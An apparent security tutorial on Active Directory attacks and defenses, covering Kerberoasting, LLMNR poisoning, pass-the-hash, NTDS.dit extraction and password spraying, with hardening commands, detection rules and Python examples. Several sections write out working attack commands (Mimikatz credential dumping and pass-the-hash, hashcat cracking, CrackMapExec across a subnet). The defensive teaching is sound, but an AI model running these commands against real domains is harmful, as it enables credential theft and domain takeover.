
Introduction:
Active Directory (AD) serves as the central authentication and authorization hub for over 90% of Fortune 500 companies, making it the single most valuable target for cyber attackers. Once compromised, adversaries can move laterally, escalate privileges, dump credential hashes, and effectively control the entire Windows domain. Understanding both the offensive techniques and defensive countermeasures is critical for any enterprise security team seeking to prevent a full domain takeover.
Learning Objectives:
- Understand the mechanics behind the top 10 Active Directory attack techniques, including Kerberoasting, Pass-the-Hash, and LLMNR poisoning.
- Learn to execute reconnaissance using BloodHound and LDAP queries to identify privilege escalation paths.
- Implement defensive hardening measures, monitoring strategies, and command-line mitigations across Windows and Linux environments.
You Should Know:
1. Kerberoasting – Extracting Service Account Hashes for Offline Cracking
Kerberoasting targets service accounts linked to Service Principal Names (SPNs). An authenticated user requests a Ticket Granting Service (TGS) ticket for any SPN, extracts the encrypted service account hash, and cracks it offline using brute-force or dictionary attacks. This technique does not require elevated privileges and often reveals high-privilege service accounts with weak passwords.
Step-by-step guide – Attacker perspective (authorized testing only):
1. Enumerate SPNs using native Windows tools:
```powershell
# List all SPNs in the domain
setspn -Q */*
# Request a TGS for a specific SPN using PowerShell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/srvweb01.corp.local"
```
2. Extract TGS tickets with Mimikatz (post-exploitation):
```cmd
rem Using mimikatz on Windows
mimikatz.exe "kerberos::list /export" exit
```
3. Crack the hash with hashcat (Linux):
```bash
# Convert kirbi to hashcat format using kirbi2john
python3 kirbi2john.py *.kirbi > hash.txt
# Crack with hashcat mode 13100 (Kerberoast TGS-REP)
hashcat -m 13100 -a 0 hash.txt rockyou.txt
```
Defensive commands (Windows Server):
```powershell
# Enforce 25+ character random passwords for service accounts.
# Note: "net user /random" only generates an 8-character password; for 25+ characters set the
# password explicitly, or better, migrate the service to a group Managed Service Account (gMSA).
net user svc_sqlapp /random /passwordreq:yes /domain

# Audit accounts that carry an SPN and whose password has not changed in the last 3 months
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName, PasswordLastSet |
    Where-Object { $_.PasswordLastSet -lt (Get-Date).AddMonths(-3) }
```
2. LLMNR/NBT-NS Poisoning – Intercepting Credential Hashes in Real Time
When a client cannot resolve a hostname via DNS, it falls back to Link-Local Multicast Name Resolution (LLMNR) or the NetBIOS Name Service (NBT-NS). Attackers on the same subnet answer these broadcast requests, impersonate the requested host, and force the victim to send an NTLMv2 challenge-response, which can be relayed or cracked offline.
Step-by-step guide – Mitigation and detection:
1. Disable LLMNR and NBT-1S via Group Policy:
```powershell
# Disable LLMNR (via GPO or local policy)
reg add "HKLM\Software\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f
# Disable NetBIOS over TCP/IP on all IP-enabled adapters
# (SetTcpipNetbios argument: 0 = use DHCP setting, 1 = enable, 2 = disable)
Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | ForEach-Object { $_.SetTcpipNetbios(2) }
```
2. Monitor for poisoning tools using Sysmon (event ID 1 for suspicious processes):
```xml
<!-- Sysmon config to detect Responder.py or Inveigh launched on a monitored Windows host.
     onmatch="include" logs the matching processes; "exclude" would drop them.
     An attacker running Responder from a separate Linux box is not visible here, so pair this
     with network-side detection (e.g. alert when a name that does not exist gets an LLMNR answer). -->
<Sysmon schemaversion="4.50">
  <EventFiltering>
    <RuleGroup name="llmnr-poisoning-tools" groupRelation="or">
      <ProcessCreate onmatch="include">
        <CommandLine condition="contains">responder</CommandLine>
        <CommandLine condition="contains">inveigh</CommandLine>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```
3. Enforce SMB signing to prevent relay attacks:
```powershell
# Require SMB signing on all domain controllers (server side)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1
```
3. Pass-the-Hash (PtH) – Lateral Movement Without the Plaintext Password
Attackers extract NTLM hashes from LSASS memory or the SAM hive and use them to authenticate to other systems without ever knowing the plaintext password. Tools like Mimikatz and CrackMapExec make this trivial. Defenders must focus on hash extraction prevention and credential guard.
Step-by-step guide – Attack simulation (authorized red team):
1. Dump hashes from LSASS using Mimikatz (requires admin):
```cmd
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
```
2. Inject hash into another session for lateral movement:
```cmd
mimikatz.exe "sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:e19ccf75ee54e06b06a5907af13cef42" exit
```
3. Use CrackMapExec to authenticate with hash (Linux):
```bash
crackmapexec smb 192.168.1.0/24 -u Administrator -H e19ccf75ee54e06b06a5907af13cef42 --local-auth
```
Defensive commands:
```powershell
# Enable Windows Defender Credential Guard (requires reboot; needs UEFI, Secure Boot and virtualization support)
$credGuard = "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard"
New-ItemProperty -Path $credGuard -Name "EnableVirtualizationBasedSecurity" -Value 1 -PropertyType DWORD -Force
New-ItemProperty -Path $credGuard -Name "RequirePlatformSecurityFeatures" -Value 3 -PropertyType DWORD -Force
# The DeviceGuard values only turn on VBS; Credential Guard itself is switched on by LsaCfgFlags
# (1 = enabled with UEFI lock, 2 = enabled without lock)
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\LSA" -Name "LsaCfgFlags" -Value 1 -PropertyType DWORD -Force
```
Block NTLM entirely where possible (Group Policy): Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> "Network security: Restrict NTLM: Incoming NTLM traffic"
4. BloodHound Reconnaissance – Mapping Attack Paths to Domain Admin
BloodHound uses graph theory to identify privilege escalation paths by ingesting AD data via SharpHound collector. Attackers can quickly find misconfigured ACLs, nested groups, and unconstrained delegation. Defenders must use the same tool to remediate high-risk edges.
Step-by-step guide – Running BloodHound defensively:
1. Collect AD data with SharpHound (run on domain-joined Windows):
```powershell
# Download SharpHound.ps1 from GitHub, then:
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain CORP.LOCAL -OutputDirectory C:\BH
```
2. Import JSON files into BloodHound (Linux via Neo4j):
```bash
# Start Neo4j database
sudo neo4j start
# Run BloodHound GUI
bloodhound --no-sandbox
```
3. Query for high-risk paths using Cypher:
```cypher
// Find all users with DCSync rights over the domain (the DCSync edge points at the Domain node)
MATCH p = (u:User)-[:DCSync]->(d:Domain) RETURN p
// Find shortest path to Domain Admins (well-known RID 512); variable-length patterns need the * prefix
MATCH p = shortestPath((u:User)-[:MemberOf|AdminTo|CanRDP|CanPSRemote*1..10]->(g:Group))
WHERE g.objectid ENDS WITH '-512' RETURN p
```
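What the two Cypher queries compute is easier to see on a toy graph. The Python below is an added example, not BloodHound's own code: a breadth-first search over a constructed graph of users, groups, one computer and a domain (every name and SID is invented) using the same edge names BloodHound uses. It returns the DCSync holders and the shortest path from each user to the RID-512 group, and generalizes the query slightly by letting the caller choose which edge types may be traversed and how many hops are allowed.

```python
"""Walk a BloodHound-style attack graph: shortest path from a user to Domain Admins and the list
of principals holding DCSync rights. The graph is constructed for this example (names and SIDs are
made up); it is not real BloodHound output."""
from collections import deque

# Node attributes; BloodHound identifies Domain Admins by the well-known RID 512 in objectid
NODES = {
    "JDOE@CORP.LOCAL": {"type": "User"},
    "ASMITH@CORP.LOCAL": {"type": "User"},
    "SVC_BACKUP@CORP.LOCAL": {"type": "User"},
    "HELPDESK@CORP.LOCAL": {"type": "Group", "objectid": "S-1-5-21-1-2-3-1105"},
    "SERVER OPS@CORP.LOCAL": {"type": "Group", "objectid": "S-1-5-21-1-2-3-1106"},
    "STAFF@CORP.LOCAL": {"type": "Group", "objectid": "S-1-5-21-1-2-3-513"},
    "DOMAIN ADMINS@CORP.LOCAL": {"type": "Group", "objectid": "S-1-5-21-1-2-3-512"},
    "SRV01.CORP.LOCAL": {"type": "Computer"},
    "CORP.LOCAL": {"type": "Domain"},
}

# Directed edges (source, relationship, target) with BloodHound's edge names
EDGES = [
    ("JDOE@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("JDOE@CORP.LOCAL", "MemberOf", "STAFF@CORP.LOCAL"),
    ("ASMITH@CORP.LOCAL", "MemberOf", "STAFF@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "SRV01.CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "MemberOf", "SERVER OPS@CORP.LOCAL"),       # nested-group misconfiguration
    ("SERVER OPS@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("SVC_BACKUP@CORP.LOCAL", "DCSync", "CORP.LOCAL"),
]

# The edge types the Cypher query above traverses
DEFAULT_EDGE_TYPES = frozenset({"MemberOf", "AdminTo", "CanRDP", "CanPSRemote"})


def is_domain_admins(node):
    attrs = NODES.get(node, {})
    return attrs.get("type") == "Group" and attrs.get("objectid", "").endswith("-512")


def shortest_path(start, is_target, edges=EDGES, edge_types=DEFAULT_EDGE_TYPES, max_hops=10):
    """Breadth-first search; returns the path as a list of (source, relationship, target) hops, or None."""
    adjacency = {}
    for src, rel, dst in edges:
        if rel in edge_types:
            adjacency.setdefault(src, []).append((rel, dst))
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if path and is_target(node):
            return path
        if len(path) >= max_hops:
            continue
        for rel, nxt in adjacency.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, rel, nxt)]))
    return None


def dcsync_principals(edges=EDGES):
    """Principals with a DCSync edge to a Domain node (the first Cypher query)."""
    return sorted(src for src, rel, dst in edges
                  if rel == "DCSync" and NODES.get(dst, {}).get("type") == "Domain")


def paths_to_domain_admins(edges=EDGES):
    """Shortest path for every User node that has one (the second Cypher query)."""
    result = {}
    for node, attrs in NODES.items():
        if attrs["type"] == "User":
            path = shortest_path(node, is_domain_admins, edges)
            if path:
                result[node] = path
    return result


if __name__ == "__main__":
    print("DCSync:", dcsync_principals())
    for user, path in paths_to_domain_admins().items():
        print(user, "->", " -> ".join(f"{rel}:{dst}" for _, rel, dst in path))
```

For remediation the interesting output is the first hop off the user: in the sample graph the nested membership of HELPDESK in SERVER OPS is the single edge whose removal breaks the path, which is exactly the "high-risk edge" the takeaways below tell defenders to hunt weekly.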
5. NTDS.dit Extraction – Dumping All Domain Hashes
The NTDS.dit file on domain controllers stores all domain user and computer password hashes. Attackers with domain admin or equivalent privileges can extract it via Volume Shadow Copy or ntdsutil. Defenders must restrict access, monitor for vssadmin usage, and deploy honeytokens.
Step-by-step guide – Attack detection:
1. Monitor for suspicious vssadmin commands (Windows Event ID 4688):
```cmd
rem Create advanced audit policy to log process creation
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
rem Without this, 4688 records only the image name, not arguments such as "create shadow"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
```
2. Detect ntdsutil usage with Sysmon (event ID 1):
```xml
<Sysmon schemaversion="4.50">
  <EventFiltering>
    <RuleGroup name="ntdsutil-ifm" groupRelation="or">
      <ProcessCreate onmatch="include">
        <!-- Both conditions must hold. Sibling conditions that are not wrapped in a Rule are ORed,
             which would fire on every command line containing "create". -->
        <Rule groupRelation="and">
          <CommandLine condition="contains">ntdsutil</CommandLine>
          <CommandLine condition="contains">create</CommandLine>
        </Rule>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```
3. Prevent non-admin access to NTDS.dit:
```cmd
rem Apply strict ACLs (this is the default, but verify it has not drifted)
icacls %SystemRoot%\NTDS\ntds.dit /inheritance:r /grant "SYSTEM:(F)" "Domain Admins:(F)"
```
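Both Sysmon snippets on this page (the responder rule in section 2 and the ntdsutil rule above) depend on how conditions combine. The Python below is an added example, not Sysmon's code: a small evaluator that applies rules written with Sysmon's condition names (`is`, `contains`, `begin with`, `end with`) and `and`/`or` group relations to constructed process-creation records, and demonstrates why the ntdsutil + create pair has to be ANDed. The command lines are constructed samples, not captured telemetry.

```python
"""Evaluate Sysmon-style process-creation rules over sample process-creation records.
Sysmon ORs sibling conditions unless they are wrapped in <Rule groupRelation="and">, so the pair
"ntdsutil" + "create" must be ANDed to avoid matching every command line that contains "create".
Condition names follow Sysmon's. All events below are constructed for this example."""

# Constructed process-creation records (field names follow Sysmon event 1). Not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": 'ntdsutil.exe "ac i ntds" ifm "create full C:\\temp\\ifm" q q'},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe create shadow /for=C:"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe New-Item -ItemType Directory -Path C:\\reports\\create_reports"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe C:\\docs\\ntdsutil-runbook.txt"},
]

# A rule is (name, group relation, [(field, condition, value), ...]); relation is "and" or "or"
RULES = [
    ("ntdsutil-ifm", "and", [("CommandLine", "contains", "ntdsutil"),
                              ("CommandLine", "contains", "create")]),
    ("vssadmin-shadow", "and", [("Image", "end with", r"\vssadmin.exe"),
                                 ("CommandLine", "contains", "create shadow")]),
]

# The same ntdsutil conditions as an OR group, which is how unwrapped sibling conditions behave
NOISY_RULES = [("ntdsutil-ifm-or", "or", RULES[0][2])]


def condition_matches(condition, actual, expected):
    """Sysmon string conditions compare case-insensitively."""
    a, e = actual.lower(), expected.lower()
    return {"is": a == e, "contains": e in a,
            "begin with": a.startswith(e), "end with": a.endswith(e)}[condition]


def rule_matches(rule, event):
    """Combine the rule's conditions with its group relation."""
    _name, relation, conditions = rule
    results = [condition_matches(cond, event.get(field, ""), value) for field, cond, value in conditions]
    return all(results) if relation == "and" else any(results)


def scan(events, rules):
    """Return (rule name, command line) for every event that satisfies a rule."""
    return [(rule[0], ev["CommandLine"]) for ev in events for rule in rules if rule_matches(rule, ev)]


if __name__ == "__main__":
    print("AND rules:")
    for name, cmd in scan(SAMPLE_EVENTS, RULES):
        print(f"  [{name}] {cmd}")
    print("OR variant (noise):")
    for name, cmd in scan(SAMPLE_EVENTS, NOISY_RULES):
        print(f"  [{name}] {cmd}")
```

With the AND rules only the IFM export and the shadow-copy creation fire; the OR variant also flags the harmless directory creation and the notepad session, which is the kind of noise that gets a rule disabled in production.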
6. Password Spraying – Bypassing Lockout Policies One Attempt at a Time
Attackers try a single common password (e.g., “Spring2026”) against hundreds of user accounts, avoiding lockout thresholds. This works remarkably well when organizations lack Azure AD Smart Lockout or intelligent throttling.
Step-by-step guide – Defensive monitoring:
1. Detect a single IP failing logins across many different users (Kusto query for Azure AD / Entra ID SigninLogs):
```kql
SigninLogs
| where TimeGenerated > ago(1h)
| where ResultType == "50126"   // invalid username or password (50057 means "user account disabled")
| summarize FailedAttempts = count(), UsersTargeted = dcount(UserPrincipalName) by IPAddress
| where UsersTargeted > 10
```
A spray is one attempt per user, so do not filter on failed attempts per user before counting users; that would discard exactly the pattern being hunted.
2. Implement a password filter DLL to block common passwords (Windows):
```powershell
# Install Azure AD (Entra) Password Protection: the proxy on a member server, the DC agent on every DC.
# The UPN below is a placeholder for a tenant administrator account.
.\AzureADPasswordProtectionProxySetup.exe /quiet
Register-AzureADPasswordProtectionProxy -AccountUpn "admin@corp.onmicrosoft.com"
Register-AzureADPasswordProtectionForest -AccountUpn "admin@corp.onmicrosoft.com"
msiexec.exe /i AzureADPasswordProtectionDCAgentSetup.msi /quiet
```
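The same aggregation as the KQL in step 1, as an added Python example that is not part of the original post, run over constructed sign-in records using the SigninLogs field names. Besides the per-IP distinct-user count it includes a per-(IP, user) counter for classic brute force and a `naive_pipeline` that reproduces the "count per user first, then count users" shape, to show that the latter returns nothing for a one-attempt-per-user spray. All IPs, users and timestamps are invented.

```python
"""Spot password spraying in sign-in telemetry and show why a per-user threshold applied before
counting users misses it. Spraying is one failed attempt per user from one source, so aggregate
distinct users per source IP. Records are constructed for this example (ResultType 50126 is the
Entra ID code for "invalid username or password"); they are not real sign-in logs."""
from collections import defaultdict
from datetime import datetime, timedelta

INVALID_PASSWORD = "50126"
BASE = datetime(2026, 3, 1, 8, 0, 0)


def _rec(time, ip, user, result=INVALID_PASSWORD):
    """Minimal SigninLogs-shaped record; TimeGenerated is kept as a parsed datetime."""
    return {"TimeGenerated": time, "IPAddress": ip, "UserPrincipalName": user, "ResultType": result}


SAMPLE_SIGNINS = (
    # 203.0.113.7: one failure against each of twelve users inside four minutes -> spray
    [_rec(BASE + timedelta(seconds=20 * i), "203.0.113.7", f"user{i:02d}@corp.local") for i in range(12)]
    # 198.51.100.9: six failures against a single account -> brute force, not spraying
    + [_rec(BASE + timedelta(seconds=5 * i), "198.51.100.9", "ceo@corp.local") for i in range(6)]
    # 10.0.0.8: one user mistyping twice, then succeeding
    + [_rec(BASE, "10.0.0.8", "jdoe@corp.local"),
       _rec(BASE + timedelta(seconds=30), "10.0.0.8", "jdoe@corp.local"),
       _rec(BASE + timedelta(seconds=60), "10.0.0.8", "jdoe@corp.local", result="0")]
)


def _failures(records, window, now):
    """Failed sign-ins that fall inside the trailing window ending at `now`."""
    return [r for r in records
            if r["ResultType"] == INVALID_PASSWORD and now - r["TimeGenerated"] <= window]


def spray_sources(records, min_users=10, window=timedelta(hours=1), now=None):
    """{ip: sorted distinct users} for sources that failed against at least min_users accounts."""
    now = now or max(r["TimeGenerated"] for r in records)
    users_by_ip = defaultdict(set)
    for r in _failures(records, window, now):
        users_by_ip[r["IPAddress"]].add(r["UserPrincipalName"])
    return {ip: sorted(users) for ip, users in users_by_ip.items() if len(users) >= min_users}


def bruteforce_sources(records, min_attempts=5, window=timedelta(hours=1), now=None):
    """{(ip, user): failures} for pairs with at least min_attempts failures (the other attack shape)."""
    now = now or max(r["TimeGenerated"] for r in records)
    counts = defaultdict(int)
    for r in _failures(records, window, now):
        counts[(r["IPAddress"], r["UserPrincipalName"])] += 1
    return {key: n for key, n in counts.items() if n >= min_attempts}


def naive_pipeline(records, per_user_threshold=3, min_users=10):
    """'count by IP,user | where count > 3 | dcount(user) by IP | where > 10':
    the per-user filter throws away every single-attempt user before users are counted."""
    counts = defaultdict(int)
    for r in records:
        if r["ResultType"] == INVALID_PASSWORD:
            counts[(r["IPAddress"], r["UserPrincipalName"])] += 1
    users_by_ip = defaultdict(set)
    for (ip, user), n in counts.items():
        if n > per_user_threshold:
            users_by_ip[ip].add(user)
    return {ip: len(users) for ip, users in users_by_ip.items() if len(users) > min_users}


if __name__ == "__main__":
    print("spray sources:", {ip: len(u) for ip, u in spray_sources(SAMPLE_SIGNINS).items()})
    print("brute-force pairs:", bruteforce_sources(SAMPLE_SIGNINS))
    print("naive pipeline:", naive_pipeline(SAMPLE_SIGNINS))
```

Low-and-slow sprays spread attempts over days to stay under any hourly window; run the same count over a longer window with a higher `min_users` as a second, slower rule rather than widening the fast one.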
7. Privilege Escalation via Unconstrained Delegation
When a computer has unconstrained delegation enabled, any user who authenticates to it forwards a copy of their TGT along with the service ticket; an attacker controlling that host can extract the TGT and use it to impersonate the user anywhere in the domain. This is particularly dangerous for domain controllers.
Step-by-step guide – Remediation:
1. Find all computers with unconstrained delegation (PowerShell):
```powershell
# Domain controllers are trusted for delegation by design; review every other host in this list
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation |
    Select-Object Name, DNSHostName, TrustedForDelegation
```
2. Disable unconstrained delegation and switch to constrained:
```powershell
Set-ADComputer -Identity "SRVWEB01" -TrustedForDelegation $false
# Resource-based constrained delegation: only svc_spn is allowed to delegate to SRVWEB01
Set-ADComputer -Identity "SRVWEB01" -PrincipalsAllowedToDelegateToAccount (Get-ADUser -Identity "svc_spn")
```
8. LDAP Reconnaissance – Querying Directory Structure Without Logs
Attackers use tools like ldapsearch (Linux) or PowerView to enumerate users, groups, and GPOs via LDAP anonymous binds if allowed. Misconfigured “Everyone” read access exposes the entire directory.
Step-by-step guide – Prevention:
1. Check for and disable anonymous LDAP binds on domain controllers:
```powershell
# Anonymous LDAP operations beyond rootDSE are off by default; they are only enabled when the
# 7th character of dsHeuristics on the Directory Service object is "2". Read it and clear it if set.
$dsa = "CN=Directory Service,CN=Windows NT,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
$h = (Get-ADObject -Identity $dsa -Properties dsHeuristics).dsHeuristics
if ($h -and $h.Length -ge 7 -and $h[6] -eq '2') {
    # keep every other heuristic position as it is, only reset the 7th
    Set-ADObject -Identity $dsa -Replace @{dsHeuristics = $h.Substring(0, 6) + '0' + $h.Substring(7)}
}
```
2. Enable LDAP signing and channel binding (these registry values are what the "Domain controller: LDAP server signing requirements" and "LDAP server channel binding token requirements" policies set; prefer the GPO in a managed domain):
```cmd
rem LDAPServerIntegrity: 2 = require signing
reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "LDAPServerIntegrity" /t REG_DWORD /d 2 /f
rem LdapEnforceChannelBinding: 2 = always enforce channel binding tokens
reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "LdapEnforceChannelBinding" /t REG_DWORD /d 2 /f
```
Signing and channel binding stop relay and tampering; they do not stop an authenticated domain user from enumerating the directory, which is why the takeaways below pair them with monitoring of LDAP query telemetry.
What Undercode Say:
- Key Takeaway 1: Active Directory attacks succeed not because of sophisticated zero-days, but due to fundamental misconfigurations—weak service account passwords, legacy protocol abuse, and excessive privileges. A disciplined hardening program covering Kerberoasting mitigations (long random passwords), disabling LLMNR/NBT-NS, and enforcing Credential Guard eliminates over 80% of common attack paths.
- Key Takeaway 2: Continuous monitoring using BloodHound (run weekly as a defender) and proactive threat hunting for LDAP reconnaissance queries (event ID 1644) transforms AD security from reactive patching to proactive risk reduction. The same tools used by red teams must become the blue team’s daily dashboard.
Prediction:
- -1: As organizations accelerate hybrid AD and Azure AD Connect deployments, misconfigured hybrid identity synchronization will become the new primary vector for domain escalation, with attackers abusing writeback permissions or Seamless SSO keys stored on-premises.
- +1: Expect Microsoft to release native AI-driven AD attack path modeling within Defender for Identity by late 2026, automatically generating remediation scripts for high-risk edges without requiring BloodHound or Neo4j expertise.
- -1: Password spraying and Kerberoasting will remain dominant due to organizational resistance to 20+ character service account passwords and MFA for service principals—human convenience continues to be the weakest link.
Reported By: Cybersecurity Activedirectory – Hackers Feeds